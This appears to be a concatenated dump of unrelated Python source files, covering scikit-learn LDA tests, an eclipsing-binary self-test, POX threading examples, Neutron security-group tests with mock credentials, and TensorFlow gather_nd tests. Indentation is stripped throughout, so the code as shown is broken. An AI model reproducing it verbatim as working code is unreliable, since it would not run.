from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_raise_message
from sklearn.datasets import make_blobs
from sklearn import lda
# Data is just 6 separable points in the plane
X = np.array([[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]], dtype='f')
y = np.array([1, 1, 1, 2, 2, 2])
y3 = np.array([1, 1, 2, 2, 3, 3])
# Degenerate data with only one feature (still should be separable)
X1 = np.array([[-2, ], [-1, ], [-1, ], [1, ], [1, ], [2, ]], dtype='f')
solver_shrinkage = [('svd', None), ('lsqr', None), ('eigen', None),
('lsqr', 'auto'), ('lsqr', 0), ('lsqr', 0.43),
('eigen', 'auto'), ('eigen', 0), ('eigen', 0.43)]
def test_lda_predict():
# Test LDA classification.
# This checks that LDA implements fit and predict and returns correct values
# for simple toy data.
for test_case in solver_shrinkage:
solver, shrinkage = test_case
clf = lda.LDA(solver=solver, shrinkage=shrinkage)
y_pred = clf.fit(X, y).predict(X)
assert_array_equal(y_pred, y, 'solver %s' % solver)
# Assert that it works with 1D data
y_pred1 = clf.fit(X1, y).predict(X1)
assert_array_equal(y_pred1, y, 'solver %s' % solver)
# Test probability estimates
y_proba_pred1 = clf.predict_proba(X1)
assert_array_equal((y_proba_pred1[:, 1] > 0.5) + 1, y,
'solver %s' % solver)
y_log_proba_pred1 = clf.predict_log_proba(X1)
assert_array_almost_equal(np.exp(y_log_proba_pred1), y_proba_pred1,
8, 'solver %s' % solver)
# Primarily test for commit 2f34950 -- "reuse" of priors
y_pred3 = clf.fit(X, y3).predict(X)
# LDA shouldn't be able to separate those
assert_true(np.any(y_pred3 != y3), 'solver %s' % solver)
# Test invalid shrinkages
clf = lda.LDA(solver="lsqr", shrinkage=-0.2231)
assert_raises(ValueError, clf.fit, X, y)
clf = lda.LDA(solver="eigen", shrinkage="dummy")
assert_raises(ValueError, clf.fit, X, y)
clf = lda.LDA(solver="svd", shrinkage="auto")
assert_raises(NotImplementedError, clf.fit, X, y)
# Test unknown solver
clf = lda.LDA(solver="dummy")
assert_raises(ValueError, clf.fit, X, y)
def test_lda_coefs():
# Test if the coefficients of the solvers are approximately the same.
n_features = 2
n_classes = 2
n_samples = 1000
X, y = make_blobs(n_samples=n_samples, n_features=n_features,
centers=n_classes, random_state=11)
clf_lda_svd = lda.LDA(solver="svd")
clf_lda_lsqr = lda.LDA(solver="lsqr")
clf_lda_eigen = lda.LDA(solver="eigen")
clf_lda_svd.fit(X, y)
clf_lda_lsqr.fit(X, y)
clf_lda_eigen.fit(X, y)
assert_array_almost_equal(clf_lda_svd.coef_, clf_lda_lsqr.coef_, 1)
assert_array_almost_equal(clf_lda_svd.coef_, clf_lda_eigen.coef_, 1)
assert_array_almost_equal(clf_lda_eigen.coef_, clf_lda_lsqr.coef_, 1)
def test_lda_transform():
# Test LDA transform.
clf = lda.LDA(solver="svd", n_components=1)
X_transformed = clf.fit(X, y).transform(X)
assert_equal(X_transformed.shape[1], 1)
clf = lda.LDA(solver="eigen", n_components=1)
X_transformed = clf.fit(X, y).transform(X)
assert_equal(X_transformed.shape[1], 1)
clf = lda.LDA(solver="lsqr", n_components=1)
clf.fit(X, y)
msg = "transform not implemented for 'lsqr'"
assert_raise_message(NotImplementedError, msg, clf.transform, X)
def test_lda_orthogonality():
# arrange four classes with their means in a kite-shaped pattern
# the longer distance should be transformed to the first component, and
# the shorter distance to the second component.
means = np.array([[0, 0, -1], [0, 2, 0], [0, -2, 0], [0, 0, 5]])
# We construct perfectly symmetric distributions, so the LDA can estimate
# precise means.
scatter = np.array([[0.1, 0, 0], [-0.1, 0, 0], [0, 0.1, 0], [0, -0.1, 0],
[0, 0, 0.1], [0, 0, -0.1]])
X = (means[:, np.newaxis, :] + scatter[np.newaxis, :, :]).reshape((-1, 3))
y = np.repeat(np.arange(means.shape[0]), scatter.shape[0])
# Fit LDA and transform the means
clf = lda.LDA(solver="svd").fit(X, y)
means_transformed = clf.transform(means)
d1 = means_transformed[3] - means_transformed[0]
d2 = means_transformed[2] - means_transformed[1]
d1 /= np.sqrt(np.sum(d1 ** 2))
d2 /= np.sqrt(np.sum(d2 ** 2))
# the transformed within-class covariance should be the identity matrix
assert_almost_equal(np.cov(clf.transform(scatter).T), np.eye(2))
# the means of classes 0 and 3 should lie on the first component
assert_almost_equal(np.abs(np.dot(d1[:2], [1, 0])), 1.0)
# the means of classes 1 and 2 should lie on the second component
assert_almost_equal(np.abs(np.dot(d2[:2], [0, 1])), 1.0)
def test_lda_scaling():
# Test if classification works correctly with differently scaled features.
n = 100
rng = np.random.RandomState(1234)
# use uniform distribution of features to make sure there is absolutely no
# overlap between classes.
x1 = rng.uniform(-1, 1, (n, 3)) + [-10, 0, 0]
x2 = rng.uniform(-1, 1, (n, 3)) + [10, 0, 0]
x = np.vstack((x1, x2)) * [1, 100, 10000]
y = [-1] * n + [1] * n
for solver in ('svd', 'lsqr', 'eigen'):
clf = lda.LDA(solver=solver)
# should be able to separate the data perfectly
assert_equal(clf.fit(x, y).score(x, y), 1.0,
'using covariance: %s' % solver)
def test_covariance():
x, y = make_blobs(n_samples=100, n_features=5,
centers=1, random_state=42)
# make features correlated
x = np.dot(x, np.arange(x.shape[1] ** 2).reshape(x.shape[1], x.shape[1]))
c_e = lda._cov(x, 'empirical')
assert_almost_equal(c_e, c_e.T)
c_s = lda._cov(x, 'auto')
assert_almost_equal(c_s, c_s.T)
|
s-t-e-a-l-t-h/Eclipsing-binaries-library
|
refs/heads/master
|
objects/SelfTest.py
|
1
|
#!/usr/bin/python
""" SelfTest trieda
-------------------
Trieda na vnutorne testovanie funkcii celeho balika
Inicializacne parametre:
------------------------
Staticka trieda, ziadne inicializacne parametre
Metody a strucny popis (blizsi popis funkcnosti v komentaroch k jednotlivym riadkom kodu v funkciach):
------------------------------------------------------------------------------------------------------
init_binary_mass_test()
=======================
Vstupne parametre:
------------------
rand_values : [integer], defaultna hodnota "100", premenna urcujuca pocet testov, pocet dvojic hmotnosti pre system
potential : [float], defaultna hodnota "100", premenna definujuca potencial pre obe zlozky pouzite vo vsetkych
testoch
min_mass : [float], defaultna hodnota "0.2", minimalna hmotnost, ktora sa nahodne generuje
max_mass : [float], defaultna hodnota "0.2", maximalna hmotnost, ktora sa nahodne generuje
Return:
-------
void
Popis:
------
funkcia vygeneruje rand_values dvojic hmotnosti a a snazi sa pri zadanom potential vygenerovat binarny system
v pripade poruchy vypise problem
Bug:
----
ziaden znamy bug
lagrangian_points_test()
========================
Vstupne parametre:
------------------
rand_values : [integer], defaultna hodnota "100", premenna urcujuca pocet testov, pocet dvojic hmotnosti pre system
potential : [float], defaultna hodnota "100", premenna definujuca potencial pre obe zlozky pouzite vo vsetkych
testoch
min_mass : [float], defaultna hodnota "0.2", minimalna hmotnost, ktora sa nahodne generuje
max_mass : [float], defaultna hodnota "0.2", maximalna hmotnost, ktora sa nahodne generuje
Return:
-------
void
Popis:
------
funkcia vygeneruje rand_values dvojic hmotnosti a a snazi sa pri zadanom potential spocitat lagrangeove body
Bug:
----
ziaden znamy bug
"""
import objects.Star as Star
import objects.Binary as Binary
# import globe.variables as gv
# import objects.Plot as Plt
import objects.Function as Fn
# import objects.Geometry as Geo
# import sys
# import numpy as np
import time as time
def init_binary_mass_test(rand_values=100, potential=100, min_mass=0.2, max_mass=20):
start_time = time.time()
random_primary_mass = Fn.rand(min_mass, max_mass, rand_values, time.time())
random_scondary_mass = Fn.rand(min_mass, max_mass, rand_values, random_primary_mass[0])
stars_combination = []
for pm, sm in list(zip(random_primary_mass, random_scondary_mass)):
stars_combination.append([
Star.Star(mass=pm, synchronicity_parameter=1., potential=potential, effective_temperature=5000.,
gravity_darkening=1., metallicity=0., albedo=0.),
Star.Star(mass=sm, synchronicity_parameter=1., potential=potential, effective_temperature=5000.,
gravity_darkening=1., metallicity=0., albedo=0.),
])
for system in stars_combination:
bin_sys = Binary.Binary(primary=system[0], secondary=system[1], system="eb", verbose=True)
if not bin_sys.init:
print("Problem in binary system with parameters:")
print("primary mass:\t\t" + str(bin_sys.primary.mass))
print(" potential:\t\t" + str(bin_sys.primary.potential))
print("secondary mass:\t\t" + str(bin_sys.secondary.mass))
print(" potential:\t\t" + str(bin_sys.secondary.potential))
# tato testovacia funkcia je napisana tak, ze sa na obe zlozky pouziva rovnaky potentcial a preto staci vypisovat len jeden filling_factor
print("Filling factor:\t\t" + str(bin_sys.primary.filling_factor))
print("Inner potential:\t" + str(bin_sys.potential_inner))
print("Outer potential:\t" + str(bin_sys.potential_outer))
print("Potential dif:\t\t" + str(bin_sys.df_potential))
print("Critical:\t\t" + str(bin_sys.primary.critical_potential))
print("_________________________________________")
print("")
### hodnoty pri ktorych raz vybehol error na primarnom polarnom polomere a viackrat sa uz neprejavil
### primary.potential = secondary.potentcial = 20.0
### primary.mass = 1.00116324935
### secondary.mass = 4.24889197062
end_time = time.time()
print("init_binary_mass_test() finished, elapsed time:" + str(round(end_time - start_time, 5)) + "sec")
def lagrangian_points_test(rand_values=100, potential=100, min_mass=0.2, max_mass=20):
# tato funkcia je len pre dualne pretestovanie, v skutocnosti sa totiz uz sama odreze pri nicializacii triedy Binary
# tam je tottiz vypocet kritickych bodov a tej je v try: except: konstrukcii, takze ak tam nastane nejaka chyba,
# tak sa nastavi init premenna na False a uz sa potom tu netestuje
start_time = time.time()
random_primary_mass = Fn.rand(min_mass, max_mass, rand_values, time.time())
random_scondary_mass = Fn.rand(min_mass, max_mass, rand_values, random_primary_mass[0])
stars_combination = []
for pm, sm in list(zip(random_primary_mass, random_scondary_mass)):
stars_combination.append([
Star.Star(mass=pm, synchronicity_parameter=1., potential=potential, effective_temperature=5000.,
gravity_darkening=1., metallicity=0., albedo=0.),
Star.Star(mass=sm, synchronicity_parameter=1., potential=potential, effective_temperature=5000.,
gravity_darkening=1., metallicity=0., albedo=0.),
])
for system in stars_combination:
# tu je vypnute verbose, pretoze ak by bolo zpanute, platilo by to pre vsetko v triede Binary a teda aj pre
# vypocet polarneho polomeru, kde by to tym padom pritovalo chybu a mna teraz nezaujima, ze je nefyzikalna
# hodnota velicin pre cely system, ten sa proste podla init vyhodi prec
bin_sys = Binary.Binary(primary=system[0], secondary=system[1], system="eb", verbose=False)
if bin_sys.init:
# zmena verbose, aby to zacalo vypisovat chybove hlasky
bin_sys.verbose = True
lp = bin_sys.get_lagrangian_points(actual_distance=1.0, t_object="secondary")
# po dopocitani, to treba opat vypnut, pretoze sa bude vytvarat opat novy system
bin_sys.verbose = False
# ak je lagrangeovych bodov menej ako 3 v zozname, tak sa niekde stala chyba a vypise sa to
if len(lp) != 3:
print("Lagrangian points")
print("Problem in binary system with parameters:")
print("primary mass:\t\t" + str(bin_sys.primary.mass))
print(" potential:\t\t" + str(bin_sys.primary.potential))
print("secondary mass:\t\t" + str(bin_sys.secondary.mass))
print(" potential:\t\t" + str(bin_sys.secondary.potential))
print("_________________________________________")
print("")
end_time = time.time()
print("lagrangian_points_test() finished, elapsed time:" + str(round(end_time - start_time, 5)) + "sec")
|
seksan2538/schedule-generator
|
refs/heads/master
|
mechanize/_sockettimeout.py
|
149
|
import socket
try:
_GLOBAL_DEFAULT_TIMEOUT = socket._GLOBAL_DEFAULT_TIMEOUT
except AttributeError:
_GLOBAL_DEFAULT_TIMEOUT = object()
|
ralph-mikera/RouteFlow-1
|
refs/heads/master
|
pox/pox/lib/recoco/examples.py
|
26
|
# Copyright 2011 Colin Scott
# Copyright 2011 James McCauley
#
# This file is part of POX.
#
# POX is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# POX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with POX. If not, see <http://www.gnu.org/licenses/>.
"""
These are example uses of the recoco cooperative threading library. Hopefully
they will save time for developers getting used to the POX environment.
"""
from pox.core import core
import pox.openflow.libopenflow_01 as of
from pox.lib.revent import *
from pox.lib.recoco import *
class EventLoopExample (Task):
"""
Suppose we have a component of our application that uses it's own event
loop. recoco allows us to "add" our select loop to the other event
loops running within pox.
First note that we inherit from Task. The Task class is recoco's equivalent
of python's threading.thread interface.
"""
def __init__(self):
Task.__init__(self) # call our superconstructor
self.sockets = self.get_sockets() # ... the sockets to listen to events on
# Note! We can't start our event loop until the core is up. Therefore,
# we'll add an event handler.
core.addListener(pox.core.GoingUpEvent, self.start_event_loop)
def start_event_loop(self, event):
"""
Takes a second parameter: the GoingUpEvent object (which we ignore)
"""
# This causes us to be added to the scheduler's recurring Task queue
Task.start(self)
def get_sockets(self):
return []
def handle_read_events(self):
pass
def run(self):
"""
run() is the method that gets called by the scheduler to execute this task
"""
while core.running:
"""
This looks almost exactly like python's select.select, except that it's
it's handled cooperatively by recoco
The only difference in Syntax is the "yield" statement, and the
capital S on "Select"
"""
rlist,wlist,elist = yield Select(self.sockets, [], [], 3)
events = []
for read_sock in rlist:
if read_sock in self.sockets:
events.append(read_sock)
if events:
self.handle_read_events() # ...
"""
And that's it!
TODO: write example usages of the other recoco BlockingTasks, e.g. recoco.Sleep
"""
|
CingHu/neutron-ustack
|
refs/heads/master
|
neutron/tests/unit/plumgrid/extensions/test_securitygroups.py
|
12
|
# Copyright 2014 PLUMgrid, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
PLUMgrid plugin security group extension unit tests
"""
import mock
from neutron.openstack.common import importutils
from neutron.plugins.plumgrid.plumgrid_plugin import plumgrid_plugin
from neutron.tests.unit import test_extension_security_group as ext_sg
PLUM_DRIVER = ('neutron.plugins.plumgrid.drivers.fake_plumlib.Plumlib')
FAKE_DIRECTOR = '1.1.1.1'
FAKE_PORT = '1234'
FAKE_USERNAME = 'fake_admin'
FAKE_PASSWORD = 'fake_password'
FAKE_TIMEOUT = '0'
class SecurityGroupsTestCase(ext_sg.SecurityGroupDBTestCase):
_plugin_name = ('neutron.plugins.plumgrid.plumgrid_plugin.'
'plumgrid_plugin.NeutronPluginPLUMgridV2')
def setUp(self):
def mocked_plumlib_init(self):
director_plumgrid = FAKE_DIRECTOR
director_port = FAKE_PORT
director_username = FAKE_USERNAME
director_password = FAKE_PASSWORD
timeout = FAKE_TIMEOUT
self._plumlib = importutils.import_object(PLUM_DRIVER)
self._plumlib.director_conn(director_plumgrid,
director_port, timeout,
director_username,
director_password)
with mock.patch.object(plumgrid_plugin.NeutronPluginPLUMgridV2,
'plumgrid_init', new=mocked_plumlib_init):
super(SecurityGroupsTestCase, self).setUp(self._plugin_name)
def tearDown(self):
super(SecurityGroupsTestCase, self).tearDown()
class TestSecurityGroups(ext_sg.TestSecurityGroups, SecurityGroupsTestCase):
pass
class TestSecurityGroupsXML(TestSecurityGroups):
fmt = 'xml'
|
zasdfgbnm/tensorflow
|
refs/heads/master
|
tensorflow/python/kernel_tests/gather_nd_op_test.py
|
18
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.tf.gather_nd."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import numpy as np
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class GatherNdTest(test.TestCase):
def _testSimpleDtype(self, dtype):
with self.test_session(use_gpu=True):
params = constant_op.constant(np.array([8, 1, 2, 3, 7, 5], dtype=dtype))
indices = constant_op.constant([[4], [4], [0]])
gather_nd_t = array_ops.gather_nd(params, indices)
gather_nd_val = gather_nd_t.eval()
self.assertAllEqual(np.array([7, 7, 8], dtype=dtype), gather_nd_val)
self.assertEqual([3], gather_nd_t.get_shape())
def testSimpleDtype(self):
self._testSimpleDtype(np.float32)
self._testSimpleDtype(np.float64)
self._testSimpleDtype(np.int32)
self._testSimpleDtype(np.int64)
self._testSimpleDtype(np.complex64)
self._testSimpleDtype(np.complex128)
self._testSimpleDtype("|S") # byte strings in python2 + 3
def testEmptyIndicesAndParamsOKButJustEmptyParamsFails(self):
with self.test_session(use_gpu=True):
params = np.ones((3, 3), dtype=np.float32)
indices_empty = np.empty((0, 2), dtype=np.int32)
gather_nd_ok_t = array_ops.gather_nd(params, indices_empty)
gather_nd_ok_val = gather_nd_ok_t.eval()
self.assertEqual([0], gather_nd_ok_t.get_shape())
self.assertAllClose(np.empty((0,), dtype=np.float32), gather_nd_ok_val)
indices_empty = np.empty((0, 1), dtype=np.int32)
gather_nd_ok_t = array_ops.gather_nd(params, indices_empty)
gather_nd_ok_val = gather_nd_ok_t.eval()
self.assertEqual([0, 3], gather_nd_ok_t.get_shape())
self.assertAllClose(np.empty((0, 3), dtype=np.float32), gather_nd_ok_val)
params_empty = np.empty((0, 3), dtype=np.float32)
indices_empty = np.empty((0, 2), dtype=np.int32)
gather_nd_ok_t = array_ops.gather_nd(params_empty, indices_empty)
gather_nd_ok_val = gather_nd_ok_t.eval()
self.assertEqual([0], gather_nd_ok_t.get_shape())
self.assertAllClose(np.empty((0,), dtype=np.float32), gather_nd_ok_val)
params_empty = np.empty((0, 3), dtype=np.float32)
indices_nonempty = np.zeros((1, 2), dtype=np.int32)
gather_nd_break_t = array_ops.gather_nd(params_empty, indices_nonempty)
with self.assertRaisesOpError(
r"Requested more than 0 entries, but params is empty."):
gather_nd_break_t.eval()
self.assertAllClose(np.empty((0,), dtype=np.float32), gather_nd_ok_val)
def testIndexScalar(self):
with self.test_session(use_gpu=True):
params = np.array(
[[-8, -1, -2, -3, -7, -5], [8, 1, 2, 3, 7, 5]], dtype=np.float32).T
indices = constant_op.constant([4, 1])
gather_nd_t = array_ops.gather_nd(params, indices)
gather_nd_val = gather_nd_t.eval()
self.assertEqual([], gather_nd_t.get_shape())
self.assertAllEqual(np.array(7), gather_nd_val)
def testParamsRankLargerThanIndexIndexScalarSlices(self):
with self.test_session(use_gpu=True):
params = np.array(
[[-8, -1, -2, -3, -7, -5], [8, 1, 2, 3, 7, 5]], dtype=np.float32).T
indices = constant_op.constant([4])
gather_nd_t = array_ops.gather_nd(params, indices)
gather_nd_val = gather_nd_t.eval()
self.assertEqual([2], gather_nd_t.get_shape())
self.assertAllEqual(np.array([-7, 7]), gather_nd_val)
def testParamsRankLargerThanIndexSlices(self):
with self.test_session(use_gpu=True):
params = np.array(
[[-8, -1, -2, -3, -7, -5], [8, 1, 2, 3, 7, 5]], dtype=np.float32).T
indices = constant_op.constant([[4], [4], [0]])
gather_nd_t = array_ops.gather_nd(params, indices)
gather_nd_val = gather_nd_t.eval()
self.assertEqual([3, 2], gather_nd_t.get_shape())
self.assertAllEqual(np.array([[-7, 7], [-7, 7], [-8, 8]]), gather_nd_val)
def testHigherRankParamsLargerThanIndexSlices(self):
with self.test_session(use_gpu=True):
params = np.array(
[[[-8, -1, -2, -3, -7, -5], [8, 1, 2, 3, 7, 5]],
[[-80, -10, -20, -30, -70, -50], [80, 10, 20, 30, 70, 50]]],
dtype=np.float32).T
params_t = constant_op.constant(params)
indices = constant_op.constant([[4], [4], [0]])
gather_nd_t = array_ops.gather_nd(params_t, indices)
gather_nd_val = gather_nd_t.eval()
self.assertEqual([3, 2, 2], gather_nd_t.get_shape())
self.assertAllEqual(params[[4, 4, 0]], gather_nd_val)
def testEmptyIndicesLastRankMeansCopyEntireTensor(self):
with self.test_session(use_gpu=True):
params = np.array(
[[[-8, -1, -2, -3, -7, -5], [8, 1, 2, 3, 7, 5]],
[[-80, -10, -20, -30, -70, -50], [80, 10, 20, 30, 70, 50]]],
dtype=np.float32).T
params_t = constant_op.constant(params)
indices = constant_op.constant(
[[], []], dtype=dtypes.int32) # Size (2, 0)
gather_nd_t = array_ops.gather_nd(params_t, indices)
gather_nd_val = gather_nd_t.eval()
self.assertEqual([2, 6, 2, 2], gather_nd_t.get_shape())
self.assertAllEqual(
np.vstack((params[np.newaxis, :], params[np.newaxis, :])),
gather_nd_val)
def testHigherRankParamsAndIndicesLargerThanIndexSlices(self):
with self.test_session(use_gpu=True):
params = np.array(
[[[-8, -1, -2, -3, -7, -5], [8, 1, 2, 3, 7, 5]],
[[-80, -10, -20, -30, -70, -50], [80, 10, 20, 30, 70, 50]]],
dtype=np.float32).T
params_t = constant_op.constant(params)
indices = constant_op.constant([[[3], [2], [1]], [[4], [4], [0]]])
gather_nd_t = array_ops.gather_nd(params_t, indices)
gather_nd_val = gather_nd_t.eval()
self.assertEqual([2, 3, 2, 2], gather_nd_t.get_shape())
self.assertAllEqual(params[[3, 2, 1, 4, 4, 0]].reshape(2, 3, 2, 2),
gather_nd_val)
def testHigherRankParams(self):
with self.test_session(use_gpu=True):
shape = (10, 20, 5, 1, 17)
params = np.random.rand(*shape)
indices = np.vstack([np.random.randint(0, s, size=2000) for s in shape]).T
gather_nd_t = array_ops.gather_nd(params, indices)
gather_nd_val = gather_nd_t.eval()
expected = params[tuple(indices.T)]
self.assertAllEqual(expected, gather_nd_val)
self.assertEqual([2000], gather_nd_t.get_shape())
def testHigherRankParamsAndIndices(self):
with self.test_session(use_gpu=True):
shape = (10, 20, 5, 1, 17)
params = np.random.rand(*shape)
indices = np.vstack([np.random.randint(0, s, size=2000) for s in shape]).T
indices_reshaped = indices.reshape([10, 10, 20, 5])
gather_nd_t = array_ops.gather_nd(params, indices_reshaped)
gather_nd_val = gather_nd_t.eval()
expected = params[tuple(indices.T)]
self.assertAllEqual(expected.reshape([10, 10, 20]), gather_nd_val)
self.assertEqual([10, 10, 20], gather_nd_t.get_shape())
def assertIndexedSlices(self, t):
self.assertIsInstance(t, ops.IndexedSlices)
def testUnknownIndices(self):
params = constant_op.constant([[0, 1, 2]])
indices = array_ops.placeholder(dtypes.int32)
gather_nd_t = array_ops.gather_nd(params, indices)
shape = gather_nd_t.get_shape()
self.assertEqual(None, shape.ndims)
self.assertEqual(None, shape[0].value)
def testBadIndices(self):
with self.test_session(use_gpu=True):
params = [0, 1, 2]
indices = [[[0], [7]]] # Make this one higher rank
gather_nd = array_ops.gather_nd(params, indices)
with self.assertRaisesOpError(
r"flat indices\[1, :\] = \[7\] does not index into param "
r"\(shape: \[3\]\)"):
gather_nd.eval()
def testBadIndicesWithSlices(self):
with self.test_session(use_gpu=True):
params = [[0, 1, 2]]
indices = [[[0], [0], [1]]] # Make this one higher rank
gather_nd = array_ops.gather_nd(params, indices)
with self.assertRaisesOpError(
r"flat indices\[2, :\] = \[1\] does not index into param "
r"\(shape: \[1,3\]\)"):
gather_nd.eval()
def testGradientsRank2Elements(self):
indices = constant_op.constant([[0, 0], [1, 1]], dtype=dtypes.int32)
inputs = constant_op.constant([[1, 2], [3, 4]], dtype=dtypes.float64)
outputs = array_ops.gather_nd(inputs, indices)
grad_vals = constant_op.constant([1, 2], dtype=dtypes.float64)
grads = gradients_impl.gradients([outputs], [inputs], [grad_vals])[0]
expected_grads = np.array([[1, 0], [0, 2]], dtype=np.float64)
with self.test_session(use_gpu=True):
assert np.array_equal(expected_grads, grads.eval())
def testGradientsRank2Slices(self):
indices = constant_op.constant([[1], [0]], dtype=dtypes.int32)
inputs = constant_op.constant([[1, 2], [3, 4]], dtype=dtypes.float64)
outputs = array_ops.gather_nd(inputs, indices)
grad_vals = constant_op.constant([[1, 2], [3, 4]], dtype=dtypes.float64)
grads = gradients_impl.gradients([outputs], [inputs], [grad_vals])[0]
expected_grads = np.array([[3, 4], [1, 2]], dtype=np.float64)
with self.test_session(use_gpu=True):
self.assertIndexedSlices(grads)
self.assertAllEqual(expected_grads, ops.convert_to_tensor(grads).eval())
def testGradientsRank3Elements(self):
indices = constant_op.constant(
[[[0, 1], [1, 0]], [[0, 0], [1, 1]]], dtype=dtypes.int32)
inputs = constant_op.constant(
[[[1, 3], [5, 7]], [[2, 4], [6, 8]]], dtype=dtypes.float64)
outputs = array_ops.gather_nd(inputs, indices)
grad_vals = constant_op.constant(
[[[1, 2], [3, 4]], [[5, 6], [7, 8]]], dtype=dtypes.float64)
grads = gradients_impl.gradients([outputs], [inputs], [grad_vals])[0]
expected_grads = np.array(
[[[5, 6], [1, 2]], [[3, 4], [7, 8]]], dtype=np.float64)
with self.test_session(use_gpu=True):
self.assertAllEqual(expected_grads, grads.eval())
def testGradientsRank7Elements(self):
# Shape [1,1,2,1,1,2,2]
indices = constant_op.constant(
[[[
[[[[0, 0, 0, 0, 0, 1], [0, 0, 1, 0, 0, 0]]]],
[[[[0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 1]]]]
]]],
dtype=dtypes.int32)
inputs = constant_op.constant(
[[[
[[[[1, 3], [5, 7]]]],
[[[[2, 4], [6, 8]]]]
]]], dtype=dtypes.float64)
outputs = array_ops.gather_nd(inputs, indices)
grad_vals = constant_op.constant(
[[[
[[[[1, 2], [3, 4]]]],
[[[[5, 6], [7, 8]]]]
]]], dtype=dtypes.float64)
grads = gradients_impl.gradients([outputs], [inputs], [grad_vals])[0]
expected_grads = np.array(
[[[
[[[[5, 6], [1, 2]]]],
[[[[3, 4], [7, 8]]]]
]]], dtype=np.float64)
with self.test_session(use_gpu=True):
self.assertAllEqual(expected_grads, grads.eval())
def testGradientsInt64Indices(self):
indices = constant_op.constant(
[[[0, 1], [1, 0]], [[0, 0], [1, 1]]], dtype=dtypes.int64)
inputs = constant_op.constant(
[[[1, 3], [5, 7]], [[2, 4], [6, 8]]], dtype=dtypes.float64)
outputs = array_ops.gather_nd(inputs, indices)
grad_vals = constant_op.constant(
[[[1, 2], [3, 4]], [[5, 6], [7, 8]]], dtype=dtypes.float64)
grads = gradients_impl.gradients([outputs], [inputs], [grad_vals])[0]
expected_grads = np.array(
[[[5, 6], [1, 2]], [[3, 4], [7, 8]]], dtype=np.float64)
with self.test_session(use_gpu=True):
self.assertAllEqual(expected_grads, grads.eval())
def testGradientsRank2SlicesWithEmptySpace(self):
indices = constant_op.constant([[2], [0], [5]], dtype=dtypes.int32)
inputs = constant_op.constant(
[[1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9],
[1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9],
[1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9]],
dtype=dtypes.float64)
outputs = array_ops.gather_nd(inputs, indices)
grad_vals = constant_op.constant(
[[1, 1, 1, 1, 1, 1, 1, 1, 1], [2, 2, 2, 2, 2, 2, 2, 2, 2],
[3, 3, 3, 3, 3, 3, 3, 3, 3]],
dtype=dtypes.float64)
grads = gradients_impl.gradients([outputs], [inputs], [grad_vals])[0]
expected_grads = np.array(
[[2, 2, 2, 2, 2, 2, 2, 2, 2], [0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0], [3, 3, 3, 3, 3, 3, 3, 3, 3]],
dtype=np.float64)
with self.test_session(use_gpu=True):
self.assertIndexedSlices(grads)
self.assertAllEqual(expected_grads, ops.convert_to_tensor(grads).eval())
class GatherNdOpBenchmark(test.Benchmark):
def benchmark_gather_nd_op(self):
shape = (100, 47, 18, 170, 13)
np.random.seed(127)
params = np.random.rand(*shape)
indices = np.vstack([np.random.randint(0, s, size=10000) for s in shape]).T
with session.Session():
t_params = variables.Variable(params)
t_indices = variables.Variable(indices)
gather_op = array_ops.gather_nd(t_params, t_indices)
variables.global_variables_initializer().run()
for _ in range(10):
gather_op.eval()
t1 = time.time()
for _ in range(1000):
gather_op.eval()
t2 = time.time()
self.report_benchmark(iters=1000, wall_time=(t2 - t1) / 1000.0)
if __name__ == "__main__":
test.main()
|
CDSherrill/psi4
|
refs/heads/master
|
psi4/driver/qcdb/basislistother.py
|
1
|
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2019 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
"""Module with commands building :py:class:`~basislist.BasisFamily` objects
for Pople and other non-Dunning orbital basis sets. Some
plausible fitting basis sets are supplied as defaults.
"""
from .basislist import *
def load_basfam_other():
# Pople
